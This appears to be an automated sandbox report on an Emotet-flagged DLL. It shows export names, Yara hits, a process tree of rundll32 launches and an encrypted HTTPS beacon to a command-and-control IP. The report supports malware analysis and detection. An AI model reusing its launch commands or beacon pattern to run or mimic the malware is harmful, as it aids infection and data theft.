                        ofrzojd470x100016e0
                        oofbctfc480x10001550
                        opzpazspbecyjojf490x100015b0
                        oqoigff500x10001a00
                        oujlzhzvhjh510x100016f0
                        ovpsanbypajv520x100015e0
                        pblpcaadqbdxyb530x10001680
                        ragwdgnyohftj540x100017d0
                        rfosmac550x10001710
                        rgymbuetvifqjqdlo560x10001930
                        rmoxbxbbgidnbds570x10001970
                        rxnkmfbycdcc580x10001560
                        sefltbc590x10001880
                        sgieprcsphl600x100019a0
                        shpcmnqzvyltgdt610x100016d0
                        slktbekupvmdbt620x100015c0
                        sormivnk630x10001570
                        tdblkstlyin640x10001600
                        tkllyrc650x10001650
                        tkwpnvfqnbpbdqe660x10001a20
                        tnhtgnjrabqakgeke670x10001700
                        tzpmcwwig680x10001520
                        uceklmggjof690x10001610
                        ukwdddyj700x10001640
                        uwnaptydgur710x10001940
                        vjusqoeo720x10001580
                        vnyufpq730x10001590
                        vsrwmkhzkrtlexxb740x100014e0
                        wermsdfzb750x10001770
                        wkhpfdjkypy760x100014c0
                        wksndtayhfm770x100015d0
                        wnjvxspilxpchq780x10001670
                        wuqwfssiddrcl790x10001570
                        wyyhtqptznbrknitg800x100017f0
                        wzkcijdvadq810x10001540
                        wzxlvxuyy820x100019b0
                        xhtxeilfgsghxik830x10001780
                        xvdijhconoukll840x100014b0
                        ybbwnezvxfafm850x10001750
                        yeylpreasnzamgac860x100019d0
                        ypkidshxgzkkehc870x100018c0
                        ypzvmpfbgai880x10001760
                        zbrzizodycg890x10001990
                        zdiuqcnzg900x10001920
                        zfkwwtxd910x10001490
                        zktykfwmaehxg920x10001600
                        zmkbqvofdhermov930x10001960
                        zvtqmkitgmzgo940x100017b0

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Dec 2, 2021 00:47:01.562006950 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:01.562064886 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:01.562290907 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:01.589068890 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:01.589097977 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:01.925051928 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:01.925203085 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:03.035310984 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:03.035355091 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:03.035959005 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:03.036048889 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:03.038997889 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:03.080895901 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:03.570858955 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:03.570955038 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:03.570976973 CET4434981545.63.5.129192.168.2.3
                        Dec 2, 2021 00:47:03.571068048 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:03.572988033 CET49815443192.168.2.345.63.5.129
                        Dec 2, 2021 00:47:03.573019028 CET4434981545.63.5.129192.168.2.3

                        HTTP Request Dependency Graph

                        • 45.63.5.129

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.34981545.63.5.129443C:\Windows\SysWOW64\rundll32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-01 23:47:03 UTC0OUTGET /fWxVMEvEItuVfHPcFsGHwLkZfscDpKaAeHKyPiJIqQ HTTP/1.1
                        Cookie: BPnBmsPHiG=8D4dsLTWN8wEGAED/TDSscJN6tz6UiW9Sa7p1L1j+sV8peUY3i4h541A7FXE4tOLJPvGODcUqyKdZRdd4eLVMSqHn/QSuYDzDawRyYOBXu6fQpi7mDqtISdNgCJdqllab7kmTC8JkExQ5QdDNiC5RaFQkQmH8lhmwU8xXoXh+j8s7+Z3BdjBH7uOOgjnzk8PadPgkEn5XuuSWvqAvHt+OIGRsSH4rQBUpgvQ1fCY/yKMeukT8WwcUdr5/JoJiNMk/ZsMMpoKYsGTM1YS3andCGr7w3voV5dtu6EWrfS2xnLTBepk11l/Ck/dvR9iQCeMbJwbV/hbshMw7htS0Fv4102otz0kFPNoh61rQXO2VxiWNrBF0xk=
                        Host: 45.63.5.129
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        2021-12-01 23:47:03 UTC0INHTTP/1.1 200 OK
                        Server: nginx
                        Date: Wed, 01 Dec 2021 23:47:03 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        2021-12-01 23:47:03 UTC0INData Raw: 31 35 30 0d 0a f5 5b a4 bb d6 07 ae f7 9c f1 7e 12 9a 41 38 52 b8 c8 52 77 eb d9 60 23 59 bc 11 bc d3 f3 e9 69 7d 5a ca 61 9e 18 c8 0d 6e cd 6e 1f 13 65 a7 9e 4e 34 40 27 81 92 ea 88 79 1b cc 1d 9f d2 d7 dc e3 c0 d0 39 98 69 38 79 dc f6 5f 8b 02 5d f4 be 6c a7 cc 80 d2 25 95 7a 0f c9 42 7b 4b 70 53 da c3 4c 7d 00 e8 ec 7e ca 8e f3 05 c0 16 cb 99 84 e6 21 fc 02 bc be d0 1c 5b 87 c5 e1 de 8f 96 51 7d 0e f0 da 1f 98 19 d1 24 88 79 9c 95 35 25 50 9e f9 97 87 f3 70 40 ec a4 96 68 01 92 e7 ef c8 b0 0b 7d 5f 1d bf 2d be 69 6b 46 99 27 60 32 12 4f 12 91 74 b2 67 2a 99 11 97 c6 bb df bc 6c bc 3f 34 57 a7 95 28 2b ac f0 5f e7 20 bf 78 e3 5e bf 8d e9 1f 7d 39 30 f2 cd 59 71 7b a9 a0 80 41 ac af ed 77 aa 95 a5 e3 0b 65 81 95 ae 09 91 52 bd 2c 7d ac f5 31 0a a3 a0 6a
                        Data Ascii: 150[~A8RRw`#Yi}ZanneN4@'y9i8y_]l%zB{KpSL}~![Q}$y5%Pp@h}_-ikF'`2Otg*l?4W(+_ x^}90Yq{AweR,}1j


                        Code Manipulations

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        Analysis Process: svchost.exe PID: 5048 Parent PID: 572

                        General

                        Start time:00:43:10
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Analysis Process: svchost.exe PID: 6416 Parent PID: 572

                        General

                        Start time:00:43:10
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Analysis Process: loaddll32.exe PID: 6404 Parent PID: 2948

                        General

                        Start time:00:43:11
                        Start date:02/12/2021
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
                        Commandline:loaddll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll"
                        Imagebase:0x350000
                        File size:893440 bytes
                        MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.600312961.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.600312961.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.577604622.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.577604622.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.599173428.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.599173428.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.599105151.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.599105151.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.575882015.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.575882015.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.600444475.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.600444475.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.568041715.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.568041715.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.566098694.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.566098694.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        Reputation:high

                        Analysis Process: svchost.exe PID: 6444 Parent PID: 572

                        General

                        Start time:00:43:11
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Analysis Process: cmd.exe PID: 2064 Parent PID: 6404

                        General

                        Start time:00:43:11
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                        Imagebase:0xd80000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Analysis Process: rundll32.exe PID: 6316 Parent PID: 6404

                        General

                        Start time:00:43:11
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,Control_RunDLL
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000003.522035243.0000000000785000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000003.522035243.0000000000785000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.534275093.0000000000860000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.534275093.0000000000860000.00000040.00000010.sdmp, Author: Joe Security
                        Reputation:high

                        Analysis Process: rundll32.exe PID: 6276 Parent PID: 2064

                        General

                        Start time:00:43:11
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.562932146.0000000000770000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.562932146.0000000000770000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.563477731.000000000091A000.00000004.00000020.sdmp, Author: Joe Security
                        Reputation:high

                        Analysis Process: rundll32.exe PID: 3176 Parent PID: 6404

                        General

                        Start time:00:43:16
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,ajkaibu
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.574084916.0000000000C7A000.00000004.00000020.sdmp, Author: Joe Security
                        Reputation:high

                        Analysis Process: rundll32.exe PID: 6044 Parent PID: 6404

                        General

                        Start time:00:43:23
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,akyncbgollmj
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.562952810.0000000000DFA000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.562904188.0000000000C50000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.562904188.0000000000C50000.00000040.00000010.sdmp, Author: Joe Security
                        Reputation:high

                        Analysis Process: MpCmdRun.exe PID: 6740 Parent PID: 5048

                        General

                        Start time:00:44:11
                        Start date:02/12/2021
                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                        Imagebase:0x7ff6ee0f0000
                        File size:455656 bytes
                        MD5 hash:A267555174BFA53844371226F482B86B
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Analysis Process: conhost.exe PID: 6736 Parent PID: 6740

                        General

                        Start time:00:44:11
                        Start date:02/12/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7f20f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Analysis Process: rundll32.exe PID: 6448 Parent PID: 6276

                        General

                        Start time:00:45:01
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: rundll32.exe PID: 4244 Parent PID: 6316

                        General

                        Start time:00:45:02
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee",NbYKKsmYIJwkXu
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.661109523.00000000035A0000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.661109523.00000000035A0000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.660358890.000000000331A000.00000004.00000020.sdmp, Author: Joe Security

                        Analysis Process: rundll32.exe PID: 6552 Parent PID: 6044

                        General

                        Start time:00:45:19
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: svchost.exe PID: 1896 Parent PID: 572

                        General

                        Start time:00:45:19
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: WerFault.exe PID: 204 Parent PID: 1896

                        General

                        Start time:00:45:20
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404
                        Imagebase:0x1090000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: rundll32.exe PID: 5960 Parent PID: 3176

                        General

                        Start time:00:45:20
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: svchost.exe PID: 5748 Parent PID: 572

                        General

                        Start time:00:45:24
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: WerFault.exe PID: 2268 Parent PID: 6404

                        General

                        Start time:00:45:28
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 308
                        Imagebase:0x1090000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: WerFault.exe PID: 5604 Parent PID: 1896

                        General

                        Start time:00:45:37
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6404 -ip 6404
                        Imagebase:0x1090000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: WerFault.exe PID: 5652 Parent PID: 6404

                        General

                        Start time:00:45:38
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 316
                        Imagebase:0x1090000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: svchost.exe PID: 3128 Parent PID: 572

                        General

                        Start time:00:45:56
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: rundll32.exe PID: 360 Parent PID: 4244

                        General

                        Start time:00:46:04
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001A.00000003.765865481.0000000000C4D000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000001A.00000003.765865481.0000000000C4D000.00000004.00000001.sdmp, Author: Joe Security

                        Analysis Process: svchost.exe PID: 7084 Parent PID: 572

                        General

                        Start time:00:46:09
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Disassembly

                        Code Analysis

                        Reset < >